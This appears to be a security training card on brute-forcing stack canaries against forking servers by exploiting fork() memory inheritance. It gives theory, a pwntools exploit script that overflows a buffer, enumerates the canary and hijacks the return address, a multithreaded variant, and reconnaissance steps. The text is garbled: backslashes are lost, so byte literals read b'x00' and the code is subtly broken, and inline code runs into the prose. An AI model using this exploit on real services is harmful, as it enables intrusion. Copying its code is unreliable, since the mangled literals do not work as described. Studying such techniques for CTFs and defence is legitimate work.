Canary Brute-Force on Forking Servers: Byte-by-Byte Enumeration Exploiting fork() Memory Inheritance
Theory
Why This Matters
Forking servers — like Apache pre-fork, xinetd-managed daemons, and many CTF challenge servers — call fork() to handle each connection. The child process inherits an exact copy of the parent's memory, including the TLS canary at fs:0x28. Because the canary is the same across all forks of the same parent process, it can be brute-forced byte by byte without an explicit information-leak primitive. The attack requires at most 256 × 8 = 2048 connection attempts to recover all 8 bytes. NICE K0168 and S0131 require understanding this forking-server property and how to implement an efficient byte-by-byte oracle. This is the standard technique when no format string or other info-leak is available.
Core Concept
fork() creates a child process with a copy of the parent's address space, including:
- Stack contents (and therefore the canary on the stack at the point of fork)
- TLS segment at fs:0x28 (the master canary value)
- Heap, globals, and all other memory
The child's canary is identical to the parent's. When the child crashes (SIGSEGV or __stack_chk_fail), the parent continues and the next fork() call creates another child with the same canary. This gives an attacker an unlimited oracle: send a candidate canary, observe whether the process crashes or continues, repeat.
Byte-by-byte oracle: instead of guessing all 8 bytes at once (256^8 attempts), guess one byte at a time:
- Fix the known prefix (start with
x00for byte 0 — canary always starts with null) - Try all 256 values for byte 1: send overflow with
x00 + candidate_byte + x00*6 + garbage_rbp + garbage_rip - If the process does not crash (or responds normally), the candidate byte is correct
- Move to byte 2, keep byte 1 fixed, repeat
Total attempts: 1 (byte 0, always x00) + 256×7 = 1793 attempts maximum. Average: 1 + 128×7 = 897 attempts.
Detecting crash vs. success: the oracle response depends on the server's behavior:
- Connection closed without response: crash (SIGSEGV or __stack_chk_fail)
- Connection sends expected response: success — candidate byte is correct
Technical Deep-Dive
from pwn import *
import sys
HOST = 'localhost'
PORT = 9999
def try_canary(canary_bytes):
"""Send overflow with candidate canary; return True if process survives."""
try:
r = remote(HOST, PORT, timeout=2)
r.recvuntil(b'Input: ', timeout=2)
# buf_size = 64 bytes to reach canary; adjust for your target
buf_size = 64
payload = b'A' * buf_size # fill buffer
payload += canary_bytes # candidate canary (partial or full)
payload += b'B' * 8 # saved RBP placeholder
payload += b'C' * 8 # saved RIP placeholder
r.sendline(payload)
# If the server echoes back something / sends a menu again: success
response = r.recv(timeout=1)
r.close()
return len(response) > 0
except Exception:
return False
def brute_canary():
canary = b'x00' # low byte always 0x00
for byte_idx in range(1, 8):
found = False
for candidate in range(0x00, 0x100):
probe = canary + bytes([candidate]) + b'x00' * (7 - byte_idx)
if try_canary(probe):
canary += bytes([candidate])
log.info(f'Byte {byte_idx}: {candidate:#04x} canary so far: {canary.hex()}')
found = True
break
if not found:
log.error(f'Failed at byte {byte_idx}')
sys.exit(1)
return canary
canary = brute_canary()
log.success(f'Full canary: {canary.hex()} = {u64(canary):#018x}')
# Now use the leaked canary for the real exploit
r = remote(HOST, PORT)
r.recvuntil(b'Input: ')
payload = b'A' * 64
payload += canary
payload += p64(0xdeadbeef) # saved RBP
payload += p64(0x401234) # win() address
r.sendline(payload)
r.interactive()
Timing optimization: parallelise byte guesses per position — send 256 connections simultaneously (or in batches), observe which one succeeds. This reduces wall-clock time from minutes to seconds:
from concurrent.futures import ThreadPoolExecutor, as_completed
def check_byte(byte_idx, candidate, known_prefix):
probe = known_prefix + bytes([candidate]) + b'x00' * (7 - byte_idx)
return candidate, try_canary(probe)
canary = b'x00'
for byte_idx in range(1, 8):
with ThreadPoolExecutor(max_workers=32) as executor:
futures = {
executor.submit(check_byte, byte_idx, c, canary): c
for c in range(0x100)
}
for future in as_completed(futures):
candidate, success = future.result()
if success:
canary += bytes([candidate])
log.info(f'Byte {byte_idx}: {candidate:#04x}')
break
Reverse Engineering Methodology
- Confirm the server forks:
strace -e trace=clone,fork ./serverorpstreeduring connection to see if child processes spawn. A new PID per connection confirms forking. - Confirm the canary is consistent: connect twice, trigger a crash on both, observe that the crash report (core dump, dmesg) shows the same corrupted canary value. If values differ, the server does not fork (or re-randomises).
- Find the buffer-to-canary offset: connect once, send
cyclic(200), observe the crash offset. Subtract to find exactly how many bytes fill the buffer before the canary position. - Automate with pwntools: use
remote()in a loop with appropriatetimeoutsettings. The crash causes an RST packet (connection reset), which pwntools registers as an exception — catch it to detect the "wrong candidate" case.
Common Reversing Errors
- Assuming all servers are forking: thread-based servers do not fork; they share the same canary trivially (it is process-wide), but crashing one thread crashes all threads — the oracle breaks. Connection-reset detection still works but the canary is the same for all connections, so only one successful attempt is needed per byte if you can recover.
- Including wrong null byte in byte 0: the canary's first byte is always
x00. If you start the probe with a non-null byte 0, every attempt at byte 1 will fail because the canary comparison fails at byte 0. Always fix byte 0 asx00. - Slow sequential guessing making the challenge time out: many CTF challenges have connection rate limits or total time limits. Use parallelism (as shown above) to complete the brute force within a minute rather than an hour.
- Mistaking a canary check failure for the overflow itself:
__stack_chk_failcallsabort(), which sends SIGABRT. The process exits with signal 6, not SIGSEGV (signal 11). Both result in connection closure, but if you have shell access, checking$?ordmesgdistinguishes them.
Challenge Lab
Reinforce your learning with a hands-on generated challenge based on this card's competency.